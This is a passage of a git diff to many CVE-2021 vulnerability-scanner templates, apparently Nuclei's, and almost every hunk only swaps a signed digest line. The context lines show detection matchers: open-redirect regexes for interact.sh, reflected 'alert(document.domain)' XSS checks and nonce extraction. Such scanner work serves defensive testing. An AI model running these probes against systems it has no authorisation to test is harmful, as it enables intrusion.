@@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f8cc9ebc54c7e6d7e3d46915e695ce5421f43bf803d822acf059898d2992c395022100e78d358b22127c916b58b36c1a270cc9b7b1bf7205d43abeecd4d51a09ce92db:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100da91f19790bd7f735fbda717dd4b264d7a4cd49d0c78a8266aedfa80c0a43cb4022100a98e15979b69445a43aa8b217f4e079a040e738b5414113fa9fe27f0a46d08d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index fa58a16b76..e9c1fc3fb7 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -47,5 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a0046304402202ae9f1fefb0187f9e424c19df4de6f154f53213dffb9199bc091be5b2ecb694b022057142ea660d3d866243cb2a0670a82d923bfbbea97fea3d2a9bebd98fb2db319:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008af3f90209b5ec9e1f4fb287fd58fb6acc8d0a32a647f2785961e2828c13b7ac022100cd9081d78af860ec4a1a84b455de086e3ffa833cabba8d72cdc1e4876cfd281d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 5c78877fef..f439c0acf0 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201d532a1fc2612701b5ec98a24c4f6b6b4e0fa96418d21f012cb82a0da1aaf59b022100a5e7d6b28541ff039534f6c7fd1cf48254b85ceed4095636eb6102e3e302b800:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022022c1dc27ab25bb3d91d3821e19688b141089b26b9a71be0fe0d5606e07c5a02d02201a15dfabb48fca659855959e687eaa1e8356fc4f711d2f2f510200f6629547ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index f5e1cc4246..f2866329b2 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100943e150ba374453206d98138a63c1c2d503bd852a54dec04d41ab4962974f3a50220116492bdd15132ef7643e8a7280826e81d007754f1f9866a26ca14a571a36e94:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220771ca214be08adb65e3e8d5cb89872180b442cb6bf42737f60f0f772e80c081902206e5d4ae2fede10e167dbad540bf87bfa7e8e1772d4bfa1a2d9ad47b45b817c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index d992b28e58..0ce04f5e21 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -68,5 +68,4 @@ http: - status_code_3 == 200 - contains(body_3, 'CVE-2021-24145') condition: and - -# digest: 4a0a004730450221008e81398a9485af8122577a4e2c2a83a08459d4a3a16a512032ad06dc7917681d0220374177fc623fb1f193cf507ab22d90213e429fa910acd2801c7c960b486b9e26:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207974157013ad43e2dc0b0820c04c84842044b824814dec6f2134249f22f27275022100bde3a2e99909916f90031b1026d27c09525f759b7f47743089ba113847535f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 4cb2fcd9df..c2d366ca0e 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220209a4424e2dc59822ac5d3e422537f436a281bcb1ca93413917e7978cde4c3e0022062d21e458326584e315f9b6db2caff4803d51abb54aff4ebc84791c5a5bce254:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207d9fa456ae02a81487f573f30da790f1733ce4440295ce98e3fee82768718d7a022008efe5fe5c7d0df8f979231b8312124bd73404922cb2282a9918e050258d8a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 1c1394a2ea..94d64a11db 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210096379166e29f483dc19aae47a08b005e73239ce954b6ffc84596617dfd3948dd022100ad8f27ac0064c4d923d472cea7a4100d950f9148c5c95efa08b4d46aed33c340:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206f81f13ebfbb68f2525ceeb26ca03c097594d158f4d495d4368d227de158a55d02206592874cdfb333dcc0ed0a9f78196d5e8a714da2849b585807f458ff28997f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 4cc61843ef..5369d782a6 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -80,5 +80,4 @@ http: regex: - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"}; internal: true - -# digest: 4a0a00473045022030699ae9f71d0bd05b65a6b3f99d9421cf3cdffd84fb49e4fd4fc433bba5c060022100f83ec19611b6c3da53a8f393faee581fd112924ef40bc9f94874b7f87164ac8b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022052cca671f203edae94c647e446d2f49520beeae35414613d22f095c06aff8bad0220341794e2e5423282e3c5d2967dad86b911e41d2d4332a060a8d699ae9e861958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index c1413cb4f0..4d2f029b98 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -50,5 +50,4 @@ http: - 'status_code_2 == 302' - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and - -# digest: 4a0a00473045022053933e6bf8cab54088f8e1fbfbd795c3a47f7032344f85f5aa2c3c30b5f4da05022100801b9b5b14afe5c21c70336a48c330fd8995a5b148eb9bd399af524a9bccec1a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a0d8f1fb8a6fd3b9109162c2ff2338e38e32e544105838bb85539eb6464826e0022100dd11d22afd0d548384bba7bbdb5fed8813f893205f176d3a2cacdb5ef0671aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 68e1eb4e4a..8b0388f7be 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "woo-order-export-lite")' condition: and - -# digest: 4a0a004730450221009f8c2910570aade8fcbb2ce7610e1c4c3e1b7b5cc48fdd535a7633e280c226d502201fa82283817e37d5d73c996cf2cb60007c241db6b5e3d3544a64c93bfd2275d9:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220749db576746534e15264acd9fb1c23655740194268f23e533adb4c61f3bd30e402205fca5a58a79ff0fe1aaeff03f10abc885b8227ff9ea137c9bc232d0600d11e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index e3d98c4004..fd9dcfa6d7 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f9cea640730db15a42996c9ab2040f2e39a9525b7e59d155ede95a70b6a3fa190220646529ded79a40db0bf4e2d81de0460f7ba6e7b3b9a536faaa1fe9758188df8f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022031995db6ffe94e1fa0429ac174d78e3cd32534dafd986e8ee6e6cb408d724668022100d351a739d24ff66f2a7dbd4c531b6d4d08e4adb8dc17be0ba5203334a72bf2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 379d1a3d5b..472f105984 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a0046304402200a5b236731db5a5e5c35b3e927b0828d0b720d302ae0f82c6c12a75d2cae338e02204d419df2f01abe6d893f8a42f538fbc79c1583dedbd25b2f23286078dd4655a1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201aa3556e346dad1f8cc19e16529aefe738079b371c8b097c412564d2ef2e48b002205eef258fe5d6682c53f53ef5775110772c038a06fe944d8a9be984f14fef9d5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 7bb14c98e9..e78c9ef792 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200cb5ca7169f64d280d11347905f9d8ddae0f58771edfc56a77bc30f44e9eeee1022100ccb2ace89ce1e5948dfe5a656ce93fde3ea50e3ac346caa20b44e0bdb31d248c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022064a46542e9023bc59ba88999be7601ede2b8c91a4ab7ce19a0fa457b7834e78d02205563d8982549239a0a33c39cc3a81adb85fd8e4c8e3e224bc9bed7b28c5e9dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 7b385b84fe..7c12c91125 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -49,5 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and - -# digest: 4a0a00473045022100c2ba28c5827f969098c69b767d837f405c1062acee1a2d73b8ccc29f98bf2b3b02206a9f1df7d0e7eff532109c49d47683be530a04f2a3aa1605bbd07f23b1c09ac8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100abc1a89b039ba6807388c8b062b321a2cb57520f8e2f878b271b6f7f00c1580c02210096b9e8483878e9bbe7ba1b722daf5013e8364fa6dd0dc1fd1478d7a6e0f0ce33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 8cae3b798f..1a9bcd5edd 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201a6eafc8daf6c2206551ec1a91fecb2fd901cad38d3d013b21bbcc846ed8c6b9022100b4bcbda581d8e7d7358867d521a53f28a20f2c1645ca9f29e12999b8a655a125:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206ae5a59e85ba753301905a1e3f666d9ead88f5d0ab99fc999983b85f639c90e4022100b70c76f8f88468976cd70bb2f742b2e95e6d5e3af92a0946e123f239bf6b3a08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 758f866119..b2cc2681fc 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210087df6d58afa35f11c99df6f99af22028e7adc9ccb45112112690f5484d418523022100b846b40e78d9b9102f26efd4104686f186e89497467742897e751db6ebb0325b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c727ad5d84dc1c7f41cd66fad880ab949c2314e393e36ff26213a5dadcfbee2d02207503e556125b591994a16650f006ffed5fa744a7da53059d3efca55511239281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 5ac5a3dd3b..2d42ef66eb 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f9bc5917717844b6d2bb869ac10cd2e7d872bf0f5d80831b092c978663ad12ac022100f4de0dc21225b54960908f40d16d1a9a36c29c916a264dfe5a6afd44ae983b95:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100838f9d30abcc3b41909607668c0844af2cd2290b84ef3c332ade6684eb5faaa20220197e2a2cbb4178aeb0d20dd1c82035da004f8a80132adcd874da7cf40a934a94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 9ea0a799b4..0b89ced82c 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -91,5 +91,4 @@ http: part: body_2 words: - "CVE-2021-24236" - -# digest: 4a0a00473045022044cda1546e0f40bdf8713b777d8a0b7afaab6babc26f0bcd81231b75caafda93022100a2876f37bed3d87ac9c66a17490e9b82785e3bda56ac071b3ecce50448f2b07a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f89d6685d4be80042de06c6d9ccbeb79e373f1cac4a7950ad57881eeb947fcf02207bd8512cf756abf589d38c03e67b092c8452f74cb3d8769221067dadc51db3dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index cf4d6cd2af..caa2ade555 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210090011733e1d21c96996fb32e5e47f335fe52c46bea03b55360fb0d35ce39b1b3022004c35f85f4fc38a89c2cc66424877bbb67a581e64dc160bee7f191f3c0c5c9ac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f8d97a4705081dfa772abcf0a9103a9263afcdba6b5add99a0d38f8ac9d9fdd022100cbdc01c8b27bb2461c0287b7776a45eda82fd569995a9eed652220dc707e28ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index ae54f0e6a2..346747643a 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -38,5 +38,4 @@ http: - 'status_code == 200' - 'contains(body, "") && contains(body, "invitaion-code-table")' condition: and - -# digest: 4a0a004730450221008626128adeea695b9c6ad41b0f41f0c9219e563022091cd185d6df7fe14366e402203af9a80aef8c3a5c11c775b48ab0beb0771cc0f2c77948fa32cb42b3d761ded5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100def769b53f14cf27ef56c196ac62ef25e68b0676e8aa262e7550dc22817cfbcf022036e56e1d76b89782a8c1b9ef3ea3566082809c06b80b65f15b87566b2e9852e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index 22de86eee5..06cb914206 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a000d6f1907096bbd8510677ac48701f6a36a9923107296f7097e14ecd4603b0022100d39d4c79e89fac645911c294552d3c381a9d0c9fcc2d35f5dd7068b2ed3be622:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c55fa6d9f942fa39d24944b920d4f8c6660a19e626f56b1174f8f50274331aca02207184360eabee241ae7fefd04a96e6caba2d1ba4148a9d92e13e6c21fbc1a4fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index d580f8d645..1b9ecad85e 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201c8cc43e48f890b2e6b6c786331ecd4d9a16b87cbd7e0b2f36a3f95cccf0ccf00220577843ab7dd20d4a902c0b1f01fe949d9c94fdb13dce48e5ee17a3f5357ef547:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fd1ccb0ddfb4dfe04a2d4c6bef5c4162a31228aae3b2d3093e86e45f1a1fe0a4022038038b02e65cca90668b72511b268729f2faf80d9574dc076bb1e8ca1cb4cc3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 5f5ddd4799..16e31fc832 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c01e96a69daab065ced59aa2c253320be9dc330fccda4c1b2a0dbd3e9201b055022010c1d633e649775a7afd07a7c9b0bdb8a814ba0351f361a4c22cd34fbaca03ee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100efcac78a85a2509745f4ed69ea2d31e4e379f3fe2510410c5b5b83973e40eda70220714dfbe76f6237ca7f7540e0f514482b756cf345e8a913544ead51aa5502aec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 04eca962b2..87743ba68d 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fe006d8d2e21ba28e6d7d2245a8bde1bfb1b6c833304880062f7f1dea3dbf26c022042153c400956c3ab345de5652488711121ff3497693a51427901def1b70f7e46:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220583c090de4ab40015347a992cf9fbe90ae034e43633c5ba865d797dc781de522022100b79d182f5c02d209d26f0c0d97dac6149e5266ec3fa5d956428f1edf4171a0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 553b48416a..b6247ebf1b 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -54,5 +54,4 @@ http: regex: - '"nonce":"[a-f0-9]+"' part: body - -# digest: 4b0a00483046022100e7948c8958566924d69dc6bebff12bd8ff193aecaaaac6688d8fec667e8b4eb0022100970728fee10a39754254df611c1f3c8d06da5a1fc5b8fdd1b0e3dc6839b9254a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220287e40fb2a5b569b4ffa0653604c714cae93c261630c449a41ce5897ef81c2720221009315e1e9ea9c6d54e13c7e0c4fa22fa3c3a5f86c6f2ff5f914fcf78863717bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index 81aed69b38..4a1c0fa018 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -76,5 +76,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022067d9f066a060b0540ba595aabaf0e2b3a875f19fa5557a1b812733c0b67f5d6f02205c00975e1781e3ba2bbc2fcfab63afd3c0c15fd9acf3d68b4f51b4ffe1feb174:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bcc8766b15eb18506accdfe88e98e55eff003ca17975eca97cbf108c9e28e89d022037d04768e0b6f1535711e7461fbf415853dcc18270560cbd4909a5972ab61cba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index a0c517cebc..b1a23859b5 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022009e087feb3047bcf31e1a5b9c89c2f1ce1e1ee80b9e2067836370f0c04cd03050220699a8f2c8f9af17b5da51c11d1d21283bc3c29b02842546efd570ee045d3dd86:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100def8003614418d2df10c4c70b28ec208e764e70b184c2effe9bf6f1f36f3101602201f5c7fe0e284ea2f29ae9d0723b443f5a7ab2b09358354d9702362ef353ec526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index eca64c8dad..91f54ae5db 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' - 'status_code_2 == 200' condition: and - -# digest: 4b0a00483046022100dbae186ba5cbb78dfae3eb5a26000ac6e58f6616f50179ad7c1b191cb8219b3f022100fcbde889996c50244351dfdccc1243b51178a77811e775b1cf7e1e74a79aa6cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206234dc91d1bc262e47bd2ba9d5d7ae65b464609725ce197a7ba3d5d30643856f0221009c945560ed941e791d0564ec52bf719daaa2e842707dfd4b5c896dcbf2a9938e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 253c578620..0f34059c23 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "Set up the taxonomies")' condition: and - -# digest: 4a0a00473045022100d4664a3aabc56114e8667d5816eac72029a8d5ffb0b80236075767b12159280e022034b1d561a4bae2f8cc7089496f4209176224c84ba34c82ce42a778ed5caf041e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a75c3f22db83b53fa1c8eef8926112e676b867d0d761546124574f964a62a5b3022100d96f7480b60a2f60354c9841e165484b26038c36de0f09640be4a02c65e3001e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 53f565db5e..28c606b4ed 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a0047304502205ddee77e70e929044bd2b4ee326a35f7c3d30732ca9346960c6b2463cd0c7d22022100f1ff4eca0ae92dc9106cb2bbc2ec921068a626c656f6135faf78e98b7d0e51ec:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210084605d0144ffc59a595a97881f90b3128053eb774ba68e9eebcc9f56ad3ecfd60220670410d2fa379cc520e8f269b458bd7aaf502ae653a9fafc325a19fb67236415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index a9462975d5..7735a6ccf5 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c4d5415dbc0790221a4c8bcbdde5ec329d5c514609f1954d7f9974effa2ce98e02202471d53bbdfb3ee18af8397a501b625c470885567dbc390ca513c2bb316137f1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220762536a8c71160553ac92c230827bed6ad8b8d50a1ee5a265101bb17e0c6808c022100f4b9630b4565e6dcaca9e1949689e4041385504377c182ea79e95fd8b1312dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index ae0e35d718..8e849fb8bf 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022001fa65cba70f61e8a8d859f8c70178a87fdcb710d52affd27c4d05eedc151f780221009996bfaf86b38b8787b1a0cd798c66b193451cf94c50c8d7a0371428e8b2024c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203d0250215b7f63c3805e425aff0b2854365f88887724e9eb06617995c739417a02203123b1a01d6ad2b1b4c3f87ec7752b982cdbb49ba76ff6381876972403a96e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 4e06d678fa..ff3c44adc3 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009c7ec15812717f4fdcbf5e37869cb0d1948c67628429c52c9129309c1b7f3f6e0220126ce460e7d75c23b5a9155b11fbd638ee8b8dcd1441480a0e4c82d4a2d8841c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fd451734d885fe531079363376a3b9df1daf99bb4137c4eefcfeb06fe1ba8b9602204820950d70a4b3567340e21191cb5ae808fd5573d0ed7c15d78eeca8a4f5edba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index ce5e019d31..b5a066138a 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008c72924f037371719e4bf29262f09d01309bd0276ed8484f59aa5e8275c2b1ed02202addee53b01856c03e5beb9d973391a8a33b37e7e95fd621e3e3334e0416086e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f92b5ebad388c1a1ad6f8403091fab5a5990cf0018b87d3671645fd0672e200f02205052263218ecf29b93d0207b31e7b137a5047114fe58728b735575fc5f934117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index aa3cd3e5ec..c724f57af3 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009d9e03948c23cf95f84fe6cd70d8c2b345b24cb52191feb68bfc7b45b4c3634e02207777dfffc18929f19085b41f419a3caec1da2d937ed11d67996a045d576c7fd8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203b1a4c6f4c05f3fc5183796cdc024ab5834f98bdc8ed2471f195383240a87c4a02204b7f13d69ea7ed835221f9ebcfcb9c511633c138a38c942cf226c52d15925dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index be1fea3dc9..2ddd4deef2 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100910851b378508725c1fafb17734cf12adf152d842723984d192e5cb25e712d72022100f9e6e8866455836edd61954e760aadcb4d2303614d724105b41f8112c8a03b4e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201b7765ed43def809bb5e2086a9260a6f2c81a08e14c7c8780c94fe4254184a1f022100cff4e9bdc60b1f310e646f47ca6fb664ca742350b7ad3df4e7a8e3f68151c647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index bffbf0e3ce..3190b76363 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -52,5 +52,4 @@ http: - 'status_code_2 == 500' - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' condition: and - -# 